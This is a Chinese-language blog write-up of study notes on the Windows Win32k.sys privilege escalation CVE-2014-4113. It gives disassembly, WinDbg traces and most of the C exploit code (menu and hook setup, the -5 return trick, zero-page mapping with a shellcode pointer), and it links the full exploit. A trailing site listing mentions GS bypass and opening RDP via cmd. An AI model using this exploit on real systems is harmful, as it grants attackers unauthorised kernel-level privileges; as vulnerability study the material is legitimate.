CVE-2014-4113提权漏洞学习笔记

一颗小胡椒2022-04-01 16:42:44

一、前言

1.漏洞描述

该漏洞发生的位置是在驱动文件Win32k.sys中的xxxHandleMenuMessage函数,产生的原因是没有对该函数中调用的xxxMNFindWindowFromPoint函数的返回值进行合法性验证,直接将其作为参数传递给后面的xxxSendMessage函数调用,从而造成了提权漏洞。

2.实验环境

  • 操作系统:Win7 x86 sp1 专业版
  • 编译器:Visual Studio 2017
  • 调试器:IDA Pro,WinDbg

二、漏洞分析

1.静态分析

通过IDA直接查看xxxHandleMenuMessage函数,可以在其中看到,在该函数中,会首先调用xxxMNFindWindowFromPoint函数,然后将该函数的返回值作为第一个参数被下面的xxxSendMessage函数调用。

xxxSendMessage函数是通过调用xxxSendMessageTimeout函数来实现的,而在xxxSendMessageTimeout中会有如下的代码:

.text:BF8B94E8                 push    [ebp+Src].text:BF8B94EB                 push    dword ptr [ebp+UnicodeString].text:BF8B94EE                 push    ebx.text:BF8B94EF                 push    esi.text:BF8B94F0                 call    dword ptr [esi+60h].text:BF8B94F3                 mov     ecx, [ebp+arg_18].text:BF8B94F6                 test    ecx, ecx.text:BF8B94F8                 jz      loc_BF8B9591

此时esi保存的就是xxxSendMessage第一个参数的值,也就是说此时esi=iRet。因此,如果xxxMNFindWindowFromPoint函数的返回值为-5的话,那么,此时call dword ptr [esi + 0x60]就会是call dword ptr [-5 + 0x60],就等于call dword ptr [0x5B]。此时,可以通过在0x5B处保存要执行的ShellCode的地址,那么此处的call dword ptr [esi+0x60]就会执行指定的ShellCode。

而在xxxMNFindWindowFromPoint函数中,会调用xxxSendMessage来发送一个0x1EB的消息。如果xxxSendMessage函数的返回值非0的话(比如-5),那么该返回值就会作为xxxMNFindWindowFromPoint函数的返回值返回回去。

这里IDA反编译的结果出了问题,在反汇编的代码中是可以看到,此处的xxxSendMessage函数发送的消息是0x1EB的消息:

.text:BF9395E4                 push    eax             ; Src.text:BF9395E5                 lea     eax, [ebp+UnicodeString].text:BF9395E8                 push    eax             ; UnicodeString.text:BF9395E9                 push    1EBh            ; MbString.text:BF9395EE                 push    dword ptr [edi+0Ch] ; P.text:BF9395F1                 call    _xxxSendMessage@16 ; xxxSendMessage(x,x,x,x).text:BF9395F6                 mov     esi, eax

2.动态分析

运行exp,在xxxMNFindWindowFromPoint函数发送消息的地址下断点。

中断以后,调用函数发送消息,然后查看返回值可以看到此时的返回值就是-5。

kd> gBreakpoint 0 hitwin32k!xxxMNFindWindowFromPoint+0x53:838995f1 e8a7fff7ff      call    win32k!xxxSendMessage (8381959d)kd> pwin32k!xxxMNFindWindowFromPoint+0x58:838995f6 8bf0            mov     esi,eaxkd> r eaxeax=fffffffb

继续运行到xxxMNFindWindowFromPoint函数返回前,可以看到此时的返回值为-5。

继续向下运行到xxxSendMessageTimeout调用函数处的call dword ptr [esi + 60h],可以看到此时的esi等于-5,而0x5B保存了要执行的ShellCode的地址。

继续运行,就会运行ShellCode的代码完成提权。

三、漏洞利用

想要成功触发该漏洞,需要使用TrackPopupMenu函数,该函数定义如下:

BOOL TrackPopupMenu(HMENU hMenu,           UINT uFlags,           int x,           int y,              int nReserved,           HWND hWnd,              const RECT* prcRect);

其中第一个参数hMenu是一个pop-up菜单,第六个参数hWnd则是拥有该菜单的窗口句柄,因此在exp中要创建好这些窗口,然后调用函数触发漏洞:

    HWND hWnd = NULL;    WNDCLASS wc = { 0 };    HMENU hMenu1 = NULL, hMenu2 = NULL;    MENUITEMINFO Item1 = { 0 }, Item2 = { 0 };     memset(&wc, 0, sizeof(wc));     wc.hInstance = GetModuleHandle(NULL);    wc.lpfnWndProc = WndProc;    wc.lpszClassName = "1900";     if (!RegisterClassA(&wc))    {        ShowError("RegisterClassA", GetLastError());        bRet = FALSE;        goto exit;    }     hWnd = CreateWindowA(wc.lpszClassName,                   "",                   WS_OVERLAPPEDWINDOW | WS_VISIBLE,                   0,                   0,                   640,                   480,                   NULL,                   NULL,                   wc.hInstance,                   NULL);    if (!hWnd)    {        ShowError("CreateWindowEx", GetLastError());        bRet = FALSE;        goto exit;    }     hMenu1 = CreatePopupMenu();    if (!hMenu1)    {        ShowError("CreatePopupMenu", GetLastError());        bRet = FALSE;        goto exit;    }     memset(&Item1, 0, sizeof(Item1));    memset(&Item2, 0, sizeof(Item2));     Item1.cbSize = sizeof(Item1);    Item1.fMask = MIIM_STRING;    if (!InsertMenuItemA(hMenu1, 0, TRUE, &Item1))    {        ShowError("InsertMenuItemA 1", GetLastError());        bRet = FALSE;        goto exit;    }     hMenu2 = CreatePopupMenu();    if (!hMenu2)    {        ShowError("CreatePopupMenu 2", GetLastError());        bRet = FALSE;        goto exit;    }     Item2.fMask = MIIM_STRING | MIIM_SUBMENU;    Item2.dwTypeData = "";    Item2.cch = 1;    Item2.hSubMenu = hMenu1;    Item2.cbSize = sizeof(Item2);     if (!InsertMenuItemA(hMenu2, 0, TRUE, &Item2))    {        ShowError("InsertMenuItemA 2", GetLastError());        bRet = FALSE;        goto exit;    }     // 触发漏洞    if (!TrackPopupMenu(hMenu2, 0, 0, 0, 0, hWnd, NULL))    {        ShowError("TrackPopupMenu", GetLastError());        bRet = FALSE;        goto exit;    }

同时,在主窗口的处理函数中,也需要进行判断。如果窗口处于空闲状态,需要通过PostMessage函数来模拟鼠标和键盘的操作,这样才能成功发送0x1EB的消息来达到漏洞点:

LRESULT CALLBACK WndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam){    // 如果窗口处于空间状态    if (uMsg == WM_ENTERIDLE)    {        PostMessageA(hWnd, WM_KEYDOWN, VK_DOWN, 0);        PostMessageA(hWnd, WM_KEYDOWN, VK_RIGHT, 0);        PostMessageA(hWnd, WM_LBUTTONDOWN, 0, 0);    }     return DefWindowProcA(hWnd, uMsg, wParam, lParam);}

为了让xxxSendMessage函数返回-5触发漏洞,还需要通过SetWindowHook来加入钩子函数。

HHOOK winHook = SetWindowsHookExA(WH_CALLWNDPROC,                     WndProcHook,                     NULL,                     GetCurrentThreadId());if (winHook == NULL){    ShowError("SetWindowsHookExA", GetLastError());    bRet = FALSE;    goto exit;}

在钩子函数中,拦截0x1EB的消息,通过SetWindowLongA函数来修改菜单窗口的属性。这里的第二个参数传入的是GWL_WNDPROC,意味着修改的是窗口的处理函数。

LRESULT CALLBACK WndProcHook(int nCode, WPARAM wParam, LPARAM lParam){    CWPSTRUCT *pWndProcArgs = (CWPSTRUCT *)lParam;     if (pWndProcArgs->message == 0x1EB)    {        if (UnhookWindowsHook(WH_CALLWNDPROC, WndProcHook))        {            lpPrevWndFunc = (WNDPROC)SetWindowLongA(pWndProcArgs->hwnd,                                GWL_WNDPROC,                                (LONG)MenuWndProc);            if (lpPrevWndFunc == 0)            {                ShowError("SetWindowLongA", GetLastError());            }        }    }     return CallNextHookEx(NULL, nCode, wParam, lParam);}

在窗口处理函数中,如果接收的消息是0x1EB的消息,则调用EndMenu函数销毁窗口且返回-5来触发漏洞。

LRESULT CALLBACK MenuWndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam){    if (uMsg == 0x1EB)    {        EndMenu();        return -5;    }     return CallWindowProcA(lpPrevWndFunc, hWnd, uMsg, wParam, lParam);}

最后,由于在xxxSendMessageTimeout中还有如下的验证:

此时的p就是传递的-5,所以在0地址申请内存成功以后,除了将0x5B地址的内容修改为ShellCode的地址外,还需要将0x3和0x11处的数据修改为如下数据:

BOOL Init(){    BOOL bRet = TRUE;     // 在0地址申请内存成功    if (AllocateZeroMemory())    {        *(DWORD*)(0x3) = GetPtiCurrent();        *(BYTE*)(0x11) = (BYTE)4;        *(DWORD*)(0x5B) = (DWORD)ShellCode;    }    else bRet = FALSE;     return bRet;} DWORD GetPtiCurrent(){    __asm    {        mov eax, fs:[0x18]        mov eax, [eax + 0x40]    }}

四、运行结果

完整代码的链接为:https://github.com/LegendSaber/exp/blob/master/exp/CVE-2014-4113.cpp

最后在系统上运行结果如下,可以看到提权成功。

dword
本作品采用《CC 协议》,转载必须注明作者和本文链接
EXP编写学习之绕过GS
2023-02-20 09:58:16
栈中的守护天使 :GSGS原理向栈内压入一个随机的DWORD值,这个随机数被称为canary ,IDA称为 Security Cookie。Security Cookie 放入 ebp前,并且data节中存放一个 Security Cookie的副本。栈中发生溢出时,Security Cookie首先被淹没,之后才是ebp和返回地址。函数返回之前,会添加一个Security Cookie验证操作,称为Security Check。检测到溢出时,系统将进入异常处理流程,函数不会正常返回,ret也不会被执行。函数使用无保护的关键字标记。缓冲区不是8字节类型 且 大小不大于4个字节。可以为函数强制启用GS。
0x01 进程遍历因为进程是在随时进行变动的所以我们需要获取一张快照1.1 CreateToolhelp32
MITM Fuzz下图是用户层与内核层实现通信的过程,可以看到,最后是通过NtDeviceIoControlFile来分发给相应驱动对象的派遣函数的,因此,可以通过对该函数进行HOOK操作。如果将修改以后的数据发送给NtDeviceIoControlFile函数以后,发生了内核崩溃或蓝屏,往往预示着该驱动程序可能存在内核漏洞。
windows下利用cmd开启3389端口
Hex Comparison注册分析
2023-10-12 10:49:49
在学习Flexlm ECC patch过程中,需要对比下别人patch的exe和原本exe的差异,使用到这款Hex Comparison这款二进制比较工具。那么就先来学习一下这款软件的注册机制。
如果成功连接到管道, 使用WriteFile函数将shellcode数据写入已连接的命名管道。使用IDA分析检查导出函数:第一个是反射式DLL注入,限于篇幅,在本篇中不展开分析第二个是DLL的入口函数。在后续的文章中,会根据检测特征和csprofile的绕过按照专题进行分析。同时,大部分的CS检测特征都是在此。而在后续的文章分析中,将会着重的分析CS beacon中使用到的几种DLL注入方式;beacon config的检测;同时结合CS profile 的配置,研究一下CS的对抗检测方式。
x32TLS回调函数实验
2023-05-31 09:34:55
TLS回调函数介绍TLS回调函数是在程序运行时由操作系统自动调用的一组函数,用于在进程加载和卸载时执行一些初始化和清理操作。在TLS回调函数中,可以访问当前线程的TLS数据,并对其进行修改或检查。值得一提的是TLS回调可以用来反调试,原理实为在实际的入口点代码执行之前执行检测调试器代码。为了栈平衡,我们要把传进这个回调函数的参数所占用的
进来之后,我们就可以在攻击机上面控制win7靶机了,先查看开放的端口有没有3389.3、命令行打开3389远程连接端口netstat -an. 显示successful,再次确认查看远程连接端口是否开启:netstat -an|find "3389". 现在分别讲讲各自的用法吧:5.1、xfreerdp工具①首先是xfreerdp的,命令格式如下:很容易理解,/u就是用户名,/p是密码,/v是靶机(目标)的地址 /size就是图形化界面的大小而已。输入y按下回车,等待界面出现5.2、xfreerdp工具②然后是rdesktop,命令格式很简单:rdesktop 192.168.25.132
概述在windows系统上,涉及到内核对象的功能函数,都需要从应用层权限转换到内核层权限,然后再执行想要的内核函数,最终将函数结果返回给应用层。本文就是用OpenProcess函数来观察函数从应用层到内核层的整体调用流程。OpenProcess函数,根据指定的进程ID,返回进程句柄。NTSTATUS Status; //保存函数执行状态。OBJECT_ATTRIBUTES Obja; //待打开对象的对象属性。HANDLE Handle; //存储打开的句柄。CLIENT_ID ClientId; //进程、线程ID. dwDesiredAccess, //预打开进程并获取对应的权限。ObjectNamePresent = ARGUMENT_PRESENT ; //判断对象名称是否为空
可在其中找受影响的版本复现,在受影响版本的系统中找到win32k.sys导入IDA。漏洞函数位于win32k.sys的SetImeInfoEx()函数,该函数在使用一个内核对象的字段之前并没有进行是否为空的判断,当该值为空时,函数直接读取零地址内存。如果在当前进程环境中没有映射零页面,该函数将触发页面错误异常,导致系统蓝屏发生。tagWINDOWSTATIONspklList对象的结构为:漏洞触发验证查看SSDT表dd KeServiceDescriptorTabledds Address L11C 显示地址里面值指向的地址. 以4个字节显示。
一颗小胡椒
暂无描述